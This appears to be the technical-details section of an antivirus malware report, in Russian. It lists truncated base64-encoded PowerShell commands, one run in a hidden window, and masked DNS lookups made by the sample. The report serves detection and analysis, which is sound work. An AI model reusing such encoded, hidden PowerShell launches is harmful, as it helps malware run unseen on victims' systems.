Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAG8AbgBlAHkAXwBNAGEAcgBrAGUAdABfAEEAYwBjAG8AdQBuAHQAdgByAGkAPQAnAEMAbwB0AHQAbwBuAGQAdAB2ACcAOwA...
- DNS ASK ro###shop.com
- DNS ASK ol####change.com
- DNS ASK ds##ng.com
- DNS ASK pr#####ons.pipette.com
- DNS ASK wh#####ardeducation.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAG8AbgBlAHkAXwBNAGEAcgBrAGUAdABfAEEAYwBjAG8AdQBuAHQAdgByAGkAPQAnAEMAbwB0AHQAbwBuAGQAdAB2ACcAOwA...' (со скрытым окном)